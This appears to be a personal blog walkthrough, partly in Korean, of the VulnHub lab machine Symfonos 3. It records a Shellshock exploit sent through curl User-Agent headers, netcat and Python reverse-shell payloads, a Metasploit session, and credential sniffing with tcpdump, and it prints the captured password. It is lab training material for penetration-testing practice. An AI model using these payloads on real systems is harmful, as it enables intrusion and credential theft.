INFO
Name : Symfonos 3
Difficulty : Intermediate
Type : boot2root Source
VulnHub URL : https://www.vulnhub.com/entry/symfonos-3,332/
Entry : 9 / 35
GOAL
As with most CTFs from VulnHub, the goal is to get the text file which serves as the flag from the /root directory.
SETUP
I’m using both VMWare Workstation and Virtual box(depending on conditions of the image) to host Kali and the Symfonos: 3 image, with both VMs running in a NAT network(sometimes Bridged). The previous version of Symfonos used Workstation, I tried to use it with VirtualBox this time.
0. DISCOVERY
: netdiscover
Currently scanning: 192.168.22.0/16 | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.10.1 52:54:00:12:35:00 1 60 Unknown vendor
192.168.10.2 52:54:00:12:35:00 1 60 Unknown vendor
192.168.10.3 08:00:27:d1:c4:7a 1 60 PCS Systemtechnik GmbH
192.168.10.22 08:00:27:87:09:0c 1 60 PCS Systemtechnik GmbH
1. SCANNING
21/tcp open ftp ProFTPD 1.3.5b
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open http Apache httpd 2.4.25 ((Debian))
tried to login ftp as anonymous user but failed!
2.WEB ENUMERATION & RECONNAISSANCE
by using [nikto : dirb : wfuzz : gobuster : curl]
┌──(root💀takudaddy)-[~]
└─# curl -v http://192.168.10.22 3 ⨯
* Trying 192.168.10.22:80...
* Connected to 192.168.10.22 (192.168.10.22) port 80 (#0)
> GET / HTTP/1.1
> Host: 192.168.10.22
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sun, 28 Mar 2021 12:11:35 GMT
< Server: Apache/2.4.25 (Debian)
< Last-Modified: Sat, 20 Jul 2019 05:19:54 GMT
< ETag: "f1-58e15fe4052c8"
< Accept-Ranges: bytes
< Content-Length: 241
< Vary: Accept-Encoding
< Content-Type: text/html
<
<html>
<head>
<style>
html,body{
margin:0;
height:100%;
}
img{
display:block;
width:100%; height:100%;
object-fit: cover;
}
</style>
</head>
<body>
<img src="image.jpg">
<!-- Can you bust the underworld? -->
</body>
</html>
* Connection #0 to host 192.168.10.22 left intact
'can you bust the underworld?'
┌──(root💀takudaddy)-[/usr/share/wordlists/dirb]
└─# gobuster dir -f -t 50 -x html -u http://192.168.10.22 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.10.22
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: html
[+] Add Slash: true
[+] Timeout: 10s
===============================================================
2021/03/29 09:15:10 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 241]
/icons/ (Status: 403) [Size: 278]
/cgi-bin/ (Status: 403) [Size: 278]
/gate/ (Status: 200) [Size: 202]
/server-status/ (Status: 403) [Size: 278]
===============================================================
2021/03/29 09:15:44 Finished
===============================================================
---- Scanning URL: http://192.168.10.22/ ----
+ http://192.168.10.22/cgi-bin/ (CODE:403|SIZE:278)
==> DIRECTORY: http://192.168.10.22/gate/
+ http://192.168.10.22/index.html (CODE:200|SIZE:241)
+ http://192.168.10.22/server-status (CODE:403|SIZE:278)
---- Entering directory: http://192.168.10.22/gate/ ----
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.10.22/FUZZ
Total requests: 951
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000367: 301 9 L 28 W 313 Ch "gate"
: nothing interesting
: nothing interesting
# tried to find hidden directories for '/gate'
by using dirb, wfuzz and gobuster
┌──(root💀takudaddy)-[/attack]
└─# gobuster dir -f -t 50 -x html -u http://192.168.10.22/gate -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.10.22/gate
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: html
[+] Add Slash: true
[+] Timeout: 10s
===============================================================
2021/03/29 09:29:19 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 202]
/cerberus/ (Status: 200) [Size: 202]
===============================================================
2021/03/29 09:29:54 Finished
===============================================================
: FOUND '/cerberus'
: but nothing interesting
# tried to find hidden directories for '/cgi-bin' (just in case)
by using dirb and wfuzz and gobuster
[ Running ] GOBUSTER is BURSTING against 192.168.10.22/cgi-bin
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.10.22/cgi-bin
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: html
[+] Add Slash: true
[+] Timeout: 10s
===============================================================
2021/03/29 09:20:12 Starting gobuster in directory enumeration mode
===============================================================
/underworld/ (Status: 200) [Size: 63]
===============================================================
2021/03/29 09:20:47 Finished
===============================================================
: FOUND '/underworld'
새로고침 할 때마다 시간이 달라진다.
Let me use 'curl' to examine this URL shows something rather simple :
┌──(root💀takudaddy)-[/attack]
└─# curl -v 192.168.10.22/cgi-bin/underworld 1 ⨯ 2 ⚙
* Trying 192.168.10.22:80...
* Connected to 192.168.10.22 (192.168.10.22) port 80 (#0)
> GET /cgi-bin/underworld HTTP/1.1
> Host: 192.168.10.22
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 29 Mar 2021 00:44:13 GMT
< Server: Apache/2.4.25 (Debian)
< Content-Length: 63
< Content-Type: text/html
<
19:44:13 up 54 min, 0 users, load average: 2.90, 2.86, 2.06
* Connection #0 to host 192.168.10.22 left intact
'uptime' 명령어 결과가 출력되는 것!
┌──(root💀takudaddy)-[/attack]
└─# uptime 2 ⚙
09:46:38 up 58 min, 1 user, load average: 0.07, 0.16, 0.14
3. EXPLOITATION / DOWN THE RABBIT HOLE
취약 여부를 확인해보자
┌──(root💀takudaddy)-[/attack]
└─# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'id'" http://192.168.10.22/cgi-bin/underworld
uid=1001(cerberus) gid=1001(cerberus) groups=1001(cerberus),33(www-data),1003(pcap)
┌──(root💀takudaddy)-[/attack]
└─# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://192.168.10.22/cgi-bin/underworld
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
cerberus:x:1001:1001:,,,:/home/cerberus:/bin/bash
proftpd:x:108:65534::/run/proftpd:/bin/false
ftp:x:109:65534::/srv/ftp:/bin/false
정상 출력된다.
유저명 cerberus
(혹시 모르니 hydra로
brute force를 걸어두고
다른 작업을 이어간다)
이런 종류의 취약점을
shellshcok Remote Command Injection이라고 하는데
리눅스 계열 OS에서 주로 사용하는 GNU Bash에서
공격자가 원격에서 시스템 명령을 실행 할 수 있는
취약점이라고 한다.
간단히 nc 가 있는지 검색 후
있으면 사용한다.
┌──(root💀takudaddy)-[~]
└─# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'which nc'" http://192.168.10.22/cgi-bin/underworld
/bin/nc
있다!
그렇다면
brute force는 의미가 없으니 멈추고
nc로 붙여보자.
터미널을 하나 더 띄워 리스너 기동
┌──(root💀takudaddy)-[~]
└─# nc -lvp 7979
listening on [any] 7979 ...
상대편 nc 기동시키면
/bin/nc -e /bin/bash 192.168.10.10 7979
┌──(root💀takudaddy)-[~]
└─# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c '/bin/nc -e /bin/bash 192.168.10.10 7979'" http://192.168.10.22/cgi-bin/underworld
침투성공!
┌──(root💀takudaddy)-[~]
└─# nc -lvp 7979
listening on [any] 7979 ...
192.168.10.22: inverse host lookup failed: Unknown host
connect to [192.168.10.10] from (UNKNOWN) [192.168.10.22] 42056
id
uid=1001(cerberus) gid=1001(cerberus) groups=1001(cerberus),33(www-data),1003(pcap)
참고로 shellshock = CGI 취약점,
msfconsole 로 해당 작업을 하려면
┌──(root💀takudaddy)-[/attack]
└─# msfconsole -q 2 ⚙
msf6 > use exploit/multi/http/apache_mod_cgi_bash_env_exec
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/http/apache_
mod_cgi_bash_env_exec) > set RHOST 192.168.10.22
RHOST => 192.168.10.22
msf6 exploit(multi/http/apache_
mod_cgi_bash_env_exec) > set LHOST 192.168.10.10
LHOST => 192.168.10.10
msf6 exploit(multi/http/apache_
mod_cgi_bash_env_exec) > set targeturi /cgi-bin/underworld
targeturi => /cgi-bin/underworld
msf6 exploit(multi/http/apache_
mod_cgi_bash_env_exec) > exploit
[*] Started reverse TCP handler on 192.168.10.10:4444
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (980808 bytes) to 192.168.10.22
[*] Meterpreter session 1 opened (192.168.10.10:4444 -> 192.168.10.22:44422) at 2021-03-29 12:01:57 +0900
id
meterpreter >
meterpreter > shell
Process 13629 created.
Channel 1 created.
id
uid=1001(cerberus) gid=1001(cerberus) groups=1001(cerberus),33(www-data),1003(pcap)
4. POST EXPLOITATION
cerberus@symfonos3:/usr/lib/cgi-bin$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/sbin/exim4
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/bin/umount
/bin/mount
/bin/ping
/bin/su
cerberus@symfonos3:/usr/lib/cgi-bin$ cd /home
cd /home
cerberus@symfonos3:/home$ ls -al
ls -al
total 16
drwxr-xr-x 4 root root 4096 Jul 20 2019 .
drwxr-xr-x 22 root root 4096 Jul 19 2019 ..
drwxr-xr-x 2 cerberus cerberus 4096 Jul 20 2019 cerberus
drwxr-xr-x 3 hades hades 4096 Apr 6 2020 hades
cerberus@symfonos3:/home$ cd hades
cd hades
cerberus@symfonos3:/home/hades$ ls -al
ls -al
total 28
drwxr-xr-x 3 hades hades 4096 Apr 6 2020 .
drwxr-xr-x 4 root root 4096 Jul 20 2019 ..
lrwxrwxrwx 1 root root 9 Jul 20 2019 .bash_history -> /dev/null
-rw-r--r-- 1 hades hades 220 Jul 19 2019 .bash_logout
-rw-r--r-- 1 hades hades 3526 Jul 19 2019 .bashrc
drwxr-xr-x 2 hades hades 4096 Jul 20 2019 .nano
-rw-r--r-- 1 hades hades 675 Jul 19 2019 .profile
-rw-r--r-- 1 hades hades 165 Apr 6 2020 .wget-hsts
cerberus@symfonos3:/home/hades$ find / -user hades 2>/dev/null
find / -user hades 2>/dev/null
/srv/ftp
/srv/ftp/statuscheck.txt
/home/hades
/home/hades/.bashrc
/home/hades/.profile
/home/hades/.bash_logout
/home/hades/.wget-hsts
/home/hades/.nano
/proc/664
/proc/664/task
/proc/664/task/664
/proc/664/task/664/net
/proc/664/task/664/attr
/proc/664/net
/proc/664/attr
cerberus@symfonos3:/var/www/html$ find . -type d
find . -type d
.
./gate
./gate/cerberus
./gate/cerberus/tartarus
./gate/cerberus/tartarus/titanomachy
./gate/cerberus/tartarus/hecatoncheires
./gate/cerberus/tartarus/thejudges
./gate/cerberus/tartarus/hermes
./gate/cerberus/tartarus/phlegethon
./gate/cerberus/tartarus/charon
./gate/cerberus/tartarus/cocytus
./gate/cerberus/tartarus/acheron
cerberus@symfonos3:/var/www/html$
이것 저것 검색해 봤으나 별 소득이 없었다.
all is vain.
pspy라는 툴을 활용한
사용자가 수행한 커맨드 스캔.
hades@symfonos3:/srv/ftp$ cd /tmp
hades@symfonos3:/tmp$ wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy32
--2021-03-28 23:51:11-- https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy32
Resolving github.com (github.com)... 52.78.231.108
Connecting to github.com (github.com)|52.78.231.108|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://github-releases.githubusercontent.com/120821432/d4b68b80-c51c-11e9-8159-312abf23fd4b?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20210329%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20210329T045112Z&X-Amz-Expires=300&X-Amz-Signature=1f87fd1777c5bc9993f3ae92c7621542ef0a1f5697e6de7c03a5c52e3e81eac2&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=120821432&response-content-disposition=attachment%3B%20filename%3Dpspy32&response-content-type=application%2Foctet-stream [following]
--2021-03-28 23:51:12-- https://github-releases.githubusercontent.com/120821432/d4b68b80-c51c-11e9-8159-312abf23fd4b?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20210329%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20210329T045112Z&X-Amz-Expires=300&X-Amz-Signature=1f87fd1777c5bc9993f3ae92c7621542ef0a1f5697e6de7c03a5c52e3e81eac2&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=120821432&response-content-disposition=attachment%3B%20filename%3Dpspy32&response-content-type=application%2Foctet-stream
Resolving github-releases.githubusercontent.com (github-releases.githubusercontent.com)... 185.199.109.154, 185.199.110.154, 185.199.108.154, ...
Connecting to github-releases.githubusercontent.com (github-releases.githubusercontent.com)|185.199.109.154|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2656352 (2.5M) [application/octet-stream]
Saving to: ‘pspy32’
pspy32 100%[===============================================>] 2.53M 4.98MB/s in 0.5s
2021-03-28 23:51:13 (4.98 MB/s) - ‘pspy32’ saved [2656352/2656352]
hades@symfonos3:/tmp$ chmod +x pspy32
hades@symfonos3:/tmp$ ./pspy
-bash: ./pspy: No such file or directory
hades@symfonos3:/tmp$ ./pspy32
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
opt/ftpclient/ftpclient.py
음..
상대편 서버에 tcpdump가 설치되어
있는것을 확인했다. 이를 이용해
lo (Loopback Interface)의 트래픽을
확인해본다.
방법은 두 가지
바로 출력해 확인하거나
파일에 담아 우리쪽으로 카피해
wireshark로 확인
연습을 위해 둘 다 해본다.
직접 출력 :
localhost.ftp > localhost.56690: Flags [P.], cksum 0xfe5f (incorrect -> 0x7156), seq 1:56, ack 1, win 342, options [nop,nop,TS val 18212 ecr 18212], length 55: FTP, length: 55
220 ProFTPD 1.3.5b Server (Debian) [::ffff:127.0.0.1]
22:26:01.972459 IP (tos 0x0, ttl 64, id 52482, offset 0, flags [DF], proto TCP (6), length 52)
localhost.56690 > localhost.ftp: Flags [.], cksum 0xfe28 (incorrect -> 0x1e7f), ack 56, win 342, options [nop,nop,TS val 18212 ecr 18212], length 0
22:26:01.972520 IP (tos 0x0, ttl 64, id 52483, offset 0, flags [DF], proto TCP (6), length 64)
localhost.56690 > localhost.ftp: Flags [P.], cksum 0xfe34 (incorrect -> 0x8f7b), seq 1:13, ack 56, win 342, options [nop,nop,TS val 18212 ecr 18212], length 12: FTP, length: 12
USER hades
22:26:01.972523 IP (tos 0x0, ttl 64, id 49092, offset 0, flags [DF], proto TCP (6), length 52)
localhost.ftp > localhost.56690: Flags [.], cksum 0xfe28 (incorrect -> 0x1e73), ack 13, win 342, options [nop,nop,TS val 18212 ecr 18212], length 0
22:26:01.985170 IP (tos 0x0, ttl 64, id 49093, offset 0, flags [DF], proto TCP (6), length 85)
localhost.ftp > localhost.56690: Flags [P.], cksum 0xfe49 (incorrect -> 0x1813), seq 56:89, ack 13, win 342, options [nop,nop,TS val 18216 ecr 18212], length 33: FTP, length: 33
331 Password required for hades
22:26:01.985315 IP (tos 0x0, ttl 64, id 52484, offset 0, flags [DF], proto TCP (6), length 75)
localhost.56690 > localhost.ftp: Flags [P.], cksum 0xfe3f (incorrect -> 0x7c88), seq 13:36, ack 89, win 342, options [nop,nop,TS val 18216 ecr 18216], length 23: FTP, length: 23
PASS PTpZTfU4vxgzvRBE
파일로 담아 우리쪽으로 카피해 와이어샤크로 확인 :
1. 내용 담고 서버 오픈
cerberus@symfonos3:/tmp$ tcpdump -w result.pcap -i lo
tcpdump -w result.pcap -i lo
tcpdump: listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes
cerberus@symfonos3:/tmp$ ls
ls
result.pcap
cerberus@symfonos3:/tmp$ python -m SimpleHTTPServer 8888
python -m SimpleHTTPServer 8888
Serving HTTP on 0.0.0.0 port 8888 ...
2. 공격쪽에서 wget으로 받기
┌──(root💀takudaddy)-[/attack]
└─# wget http://192.168.10.24:8888/result.pcap 1 ⨯ 2 ⚙
--2021-03-29 12:45:10-- http://192.168.10.24:8888/result.pcap
Connecting to 192.168.10.24:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8192 (8.0K) [application/vnd.tcpdump.pcap]
Saving to: ‘result.pcap’
result.pcap 100%[==========================>] 8.00K --.-KB/s in 0s
2021-03-29 12:45:10 (1.84 GB/s) - ‘result.pcap’ saved [8192/8192]
hades 유저 암호 : PTpZTfU4vxgzvRBE
hades 유저로 로그인 해본다.
cerberus@symfonos3:/usr/lib/cgi-bin$ su hades
su hades
Password: PTpZTfU4vxgzvRBE
hades@symfonos3:/usr/lib/cgi-bin$
hades@symfonos3:/usr/lib/cgi-bin$ id
id
uid=1000(hades) gid=1000(hades) groups=1000(hades),1002(gods)
hades@symfonos3:~$ cd /opt/ftpclient
hades@symfonos3:/opt/ftpclient$ ls -al
ls -al
total 16
drwxr-x--- 2 root hades 4096 Apr 6 2020 .
drwxr-xr-x 3 root root 4096 Jul 20 2019 ..
-rw-r--r-- 1 root hades 262 Apr 6 2020 ftpclient.py
-rw-r--r-- 1 root hades 251 Mar 28 22:55 statuscheck.txt
hades@symfonos3:/opt/ftpclient$ cat statuscheck.txt
cat statuscheck.txt
HTTP/1.1 200 OK
Date: Mon, 29 Mar 2021 03:53:01 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Sat, 20 Jul 2019 05:19:54 GMT
ETag: "f1-58e15fe4052c8"
Accept-Ranges: bytes
Content-Length: 241
Vary: Accept-Encoding
Content-Type: text/html
hades@symfonos3:/opt/ftpclient$ ./ftpclient.py
./ftpclient.py
bash: ./ftpclient.py: Permission denied
hades@symfonos3:/opt/ftpclient$ cat ftpclient.py
cat ftpclient.py
import ftplib
ftp = ftplib.FTP('127.0.0.1')
ftp.login(user='hades', passwd='PTpZTfU4vxgzvRBE')
ftp.cwd('/srv/ftp/')
def upload():
filename = '/opt/client/statuscheck.txt'
ftp.storbinary('STOR '+filename, open(filename, 'rb'))
ftp.quit()
upload()
hades@symfonos3:/opt/ftpclient$
5. PRIVILEGE ESCALATION
도저히 안 풀리길래 찾아봤더니
남들이 푼 서버의 /opt/ftpclient
폴더 권한은 hades로 되어있다.
하지만 내가 받은 서버는
root / hades로 되어 있어서
ftpclient.py 파일 수정이 불가능하다.
hades@symfonos3:/opt/ftpclient$ ls -al
ls -al
total 16
drwxr-x--- 2 root hades 4096 Apr 6 2020 .
drwxr-xr-x 3 root root 4096 Jul 20 2019 ..
-rw-r--r-- 1 root hades 262 Apr 6 2020 ftpclient.py
hades@symfonos3:~$ find / -writable -type d 2>/dev/null
/srv/ftp
/usr/lib/python2.7
/dev/mqueue
writable 찾아봐도 해당 파일은 없음.
만약 가능했다면
위 파일 이름과 동일한 파일의
payload를 생성해주고
원래 파일과 replace 시켜준 뒤
리스너 기동 후 대기하면
root로 붙게 된다.
혹 다른 방법이 있나
반나절 씨름했지만 못 찾았고
중요한건 배웠으니 여기서 접는다.
아래는 payload 샘플 두 개
import os
import sys
os.system("nc -e /bin/bash 192.168.10.10 8989")import socket,subprocess,os
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.10.10",8989))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p = subprocess.call(["/bin/sh","-i"])
아래는 flag 이미지
끝
728x90
'OSCP > Vulnahub' 카테고리의 다른 글
| 11. MisDirection (0) | 2021.03.30 |
|---|---|
| 10. Symfonos 5 (0) | 2021.03.29 |
| 8. Symfonos 2 (0) | 2021.03.28 |
| 7. Symfonos (0) | 2021.03.27 |
| 6. Prime : 1 (0) | 2021.03.26 |